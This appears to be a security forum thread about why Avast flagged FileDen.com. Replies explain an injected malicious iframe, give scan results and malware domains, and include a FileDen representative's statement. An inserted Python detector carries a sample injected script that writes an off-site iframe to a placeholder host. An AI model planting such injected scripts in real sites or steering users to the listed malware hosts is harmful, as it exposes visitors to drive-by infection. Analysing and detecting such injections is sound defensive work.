Avast says FileDen.com has a trojan...

http://i146.photobucket.com/albums/r243/kitsune_baka/fileden_avast.png

I’ve been using FileDen to share files for years, but after my Avast updated it now says that FileDen has some kind of trojan… is this a false positive, or is it serious?

Report 2010-10-26 08:47:45 (GMT 1)
Website fileden.com
Domain Hash 88da1b00d86b8b2077c7287f276dd23b
IP Address 98.142.215.181 [SCAN]
IP Hostname w01.fileden.com
IP Country US (United States)
AS Number 14141
AS Name WIRESIX - WireSix, Inc.
Detections 3 / 17 (18 %)
Status DANGEROUS

Scanning site with: AMaDa DETECTED
http://amada.abuse.ch/?search=fileden.com

Scanning site with: hpHosts DETECTED
http://hosts-file.net/?s=fileden.com

Scanning site with: Malware Domain List DETECTED
http://www.malwaredomainlist.com/mdl.php?search=fileden.com

Hi,

The reason avast detects this site is this piece of JavaScript code at the bottom:

http://img295.imageshack.us/img295/4333/fileden.png

Which in a readable version is:

http://img183.imageshack.us/img183/8800/fileden2.png

If you read it carefully, it is embedding an iframe with a malware URL - hXXp://robingood.cz.cc/trafcontrol/go.php?sid=6
So probably this site has been hacked.
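A defender-side check for the pattern described in the post above (an inline script that decodes and writes an off-site iframe), added here as an example and not part of the original thread. The script in the screenshots is not reproduced on this page, so the decoder-call heuristic, the sample pages and the hosts `files.example` and `bad.example` are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Calls commonly used to decode and write injected markup (heuristic, assumed).
DECODERS = re.compile(r"\b(?:eval|unescape|fromCharCode|document\.write)\b")
URLS = re.compile(r"https?://[^\s'\"<>]+")

class IframeAudit(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host, self.findings, self._script = site_host.lower(), [], None

    def _offsite(self, url):
        host = (urlparse(url).hostname or "").lower()
        same = host == self.site_host or host.endswith("." + self.site_host)
        return host if host and not same else None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            host = self._offsite(a.get("src", ""))
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or "display:none" in style or "visibility:hidden" in style)
            if host and hidden:
                self.findings.append(("hidden-offsite-iframe", host))
        elif tag == "script" and "src" not in a:
            self._script = []          # start collecting an inline script body

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body, self._script = "".join(self._script), None
            decoded = unquote(body)    # undo %XX escaping, as unescape() would
            if DECODERS.search(body) and "<iframe" in decoded.lower():
                for host in filter(None, map(self._offsite, URLS.findall(decoded))):
                    self.findings.append(("script-writes-offsite-iframe", host))

def audit(html, site_host):
    parser = IframeAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample pages; hosts are placeholders, not values from the thread.
CLEAN = '<html><body><iframe src="http://cdn.files.example/player"></iframe></body></html>'
INFECTED = CLEAN.replace("</body>", "<script>document.write(unescape("
    "'%3Ciframe%20src%3D%22http%3A//bad.example/go%22%20width%3D1%3E'))</script></body>")
```

Calling `audit(INFECTED, "files.example")` reports the injected script, while the same-site iframe in `CLEAN` produces no finding.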

But because Avast “aborted connection,” nothing got in, right???

Yes, avast saved your day!

And there are many that don't like that website:

VirusTotal - index.html - 12/43
http://www.virustotal.com/file-scan/report.html?id=4e8456c72903f55c0931b95a6e50477c922e70187b3f274acde7cb54291517ee-1288063172

Well… that sucks, FileDen was also how I hosted the mp3-files for the flash mp3 player on my Myspace. Guess I’ll hafta switch to something else now like maybe MediaFire. Kinda makes me wonder though, if it was like that before, or just recently… Avast had never said anything about the site in the past.

It is possible that the site has recently been hacked, as avast has been very hot on detecting these things. So if you have had avast for some time and have been visiting the site without problems, then this is a relatively recent problem with the site.

Hello everyone,

I am a representative from File Den and would like to clarify the situation.

Firstly, we are not in any way attempting to distribute malware to our users - we were under attack from someone intent on injecting an iframe code into our website.

We have removed all traces of this malware and have been clean for a couple of days now. We are working hard to get to the bottom of this exploit; currently we have full file system locks in place for our servers, stopping attackers from being able to write to any files whilst we get to the bottom of it.

We apologise for any inconvenience. Even the biggest websites are victims of similar attacks. Past examples include Tech Crunch, ZDNet and other large websites.

Best regards,
The File Den Team

Well I don’t know the current situation re your site, but this topic is almost 5 months old and reflects different circumstances as the avast alerts are real-time detections.

No avast alerts currently on the home page.

Sucuri sitescheck says:
web site: htxp://www.fileden.com
status: Site verified to be secure and free of malware.
web trust: Site not blacklisted.
Google Adsense installed: pub-6769203647673785
Links found:

FAQ.php
public.php
account.php?action=login
account.php?action=plan
account.php?action=password
aboutus.php
/image-hosting.php
personal.php
privacy_policy.php

But the site was found suspicious by Google Safebrowsing, and that was only yesterday:

Last time suspicious content was found on this site was on 2011-03-09.
Malicious software includes 216 scripting exploits, 69 trojans, 20 exploits. Successful infection resulted in an average of 1 new process on the target machine.

Malicious software is being hosted on 3 domains, e.g. sxp9.co.cc/, z3co.co.cc/, 194.28.113.0/.

This site was hosted on 1 network, including AS14141 (WIRESIX).

It seems this site has functioned in spreading malware to infect a further 35 sites, e.g. on2on2. blogspot.com/, insu. edu.sv/, bloggang. com/.

Found to be dangerous here:
http://www.urlvoid.com/scan/fileden.com

But Trend Micro sitesafety gives it as green,
Webutation gives it a meagre 40 points, see: http://www.urlvoid.com/scan/fileden.com
128 red downloads, 1 pop-up

Trojan.TDSS found: http://www.malwaredomainlist.com/mdl.php?search=fileden.com

Still detected by avast as: Win32:Alureon-SP also known as “CaM.BackDoor.Tdss.Win32.PEx.C.9834143283”.
see: http://www.virustotal.com/file-scan/report.html?id=04b5094db8523041f62ca3f75b99a3e5d57188d41dc091d8abeb0d464f39232d-1299787368

So safety score 0,0%, as in most cases the avast detection here is 100% malware…

polonus